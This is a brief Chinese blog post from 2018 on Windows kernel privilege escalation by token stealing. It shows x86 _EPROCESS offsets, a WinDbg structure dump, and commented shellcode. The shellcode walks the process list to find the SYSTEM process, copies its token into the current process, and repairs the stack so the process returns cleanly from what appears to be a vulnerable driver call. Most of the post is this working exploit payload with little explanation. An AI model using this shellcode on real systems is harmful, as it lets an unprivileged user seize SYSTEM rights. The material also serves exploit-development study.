windows 提权

1. 使用token

PROCESS 结构中的Token 偏移,在x86 系统中偏移0xf8
进程由双链表组成,通过_LIST_ENTRY 来链接,通过循环进程偏移0xb8 来获取所有进程偏移0xb8的地址

kd> !process 0 0 system
PROCESS 860dac78  SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 00185000  ObjectTable: 8c001bb8  HandleCount: 518.
    Image: System

kd> dt _EPROCESS 860dac78  
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS
   +0x098 ProcessLock      : _EX_PUSH_LOCK
   +0x0a0 CreateTime       : _LARGE_INTEGER 0x1d3f694`30d11160
   +0x0a8 ExitTime         : _LARGE_INTEGER 0x0
   +0x0b0 RundownProtect   : _EX_RUNDOWN_REF
   +0x0b4 UniqueProcessId  : 0x00000004 Void
   +0x0b8 ActiveProcessLinks : _LIST_ENTRY [ 0x870676d8 - 0x8416f368 ]
   +0x0c0 ProcessQuotaUsage : [2] 0
   +0x0c8 ProcessQuotaPeak : [2] 0
   +0x0d0 CommitCharge     : 0xb
   +0x0d4 QuotaBlock       : 0x841631c0 _EPROCESS_QUOTA_BLOCK
   +0x0d8 CpuQuotaBlock    : (null) 
   +0x0dc PeakVirtualSize  : 0x770000
   +0x0e0 VirtualSize      : 0x1f0000
   +0x0e4 SessionProcessLinks : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0x0ec DebugPort        : (null) 
   +0x0f0 ExceptionPortData : (null) 
   +0x0f0 ExceptionPortValue : 0
   +0x0f0 ExceptionPortState : 0y000
   +0x0f4 ObjectTable      : 0x8c001bb8 _HANDLE_TABLE
   +0x0f8 Token            : _EX_FAST_REF
   +0x0fc WorkingSetPage   : 0
   +0x100 AddressCreationLock : _EX_PUSH_LOCK
   +0x104 RotateInProgress : (null) 
   +0x108 ForkInProgress   : (null)

SHELLCODE

		"\x60"		// pushad										; Save register state on the Stack
		"\x64\xA1\x24\x01\x00\x00"	// mov eax, fs:[KTHREAD_OFFSET]			; nt!_KPCR.PcrbData.CurrentThread
		"\x8B\x40\x50"			// mov eax, [eax + EPROCESS_OFFSET]		; nt!_KTHREAD.ApcState.Process
		"\x89\xC1"			// mov ecx, eax (Current _EPROCESS structure)	
		"\x8B\x98\xF8\x00\x00\x00"	// mov ebx, [eax + TOKEN_OFFSET]		; nt!_EPROCESS.Token
		//---[Copy System PID token]
		"\xBA\x04\x00\x00\x00"		// mov edx, 4 (SYSTEM PID)			; PID 4 -> System
		"\x8B\x80\xB8\x00\x00\x00"	// mov eax, [eax + FLINK_OFFSET] <-|		; nt!_EPROCESS.ActiveProcessLinks.Flink
		"\x2D\xB8\x00\x00\x00"		// sub eax, FLINK_OFFSET           |
		"\x39\x90\xB4\x00\x00\x00"	// cmp [eax + PID_OFFSET], edx     |		; nt!_EPROCESS.UniqueProcessId
		"\x75\xED"			// jnz                           ->|		; Loop !(PID=4)
		"\x8B\x90\xF8\x00\x00\x00"	// mov edx, [eax + TOKEN_OFFSET]		; System nt!_EPROCESS.Token
		"\x89\x91\xF8\x00\x00\x00"	// mov [ecx + TOKEN_OFFSET], edx		; Replace Current Process token
		//---[Recover]
		"\x61"				// popad										; Restore register state from the Stack		
		"\x81\xC4\x8C\x07\x00\x00"	// add esp,0x78c				; Offset of IRP on stack
		"\x8B\x3C\x24"			// mov edi,DWORD PTR [esp]			; Restore the pointer to IRP
		"\x83\xC4\x08"			// add esp,0x8					; Offset of DbgPrint string
		"\x8B\x1C\x24"			// mov ebx,DWORD PTR [esp]			; Restore the DbgPrint string
		"\x81\xC4\x34\x02\x00\x00"	// add esp,0x234				; Target frame to return
		"\x31\xC0"			// NTSTATUS -> STATUS_SUCCESS :p
		"\x5D"				// pop ebp										; Restore saved EBP
		"\xC2\x08\x00"			// ret 8										; Return cleanly
posted @ 2018-05-28 23:54  一盏绿茶  阅读(136)  评论(0)    收藏  举报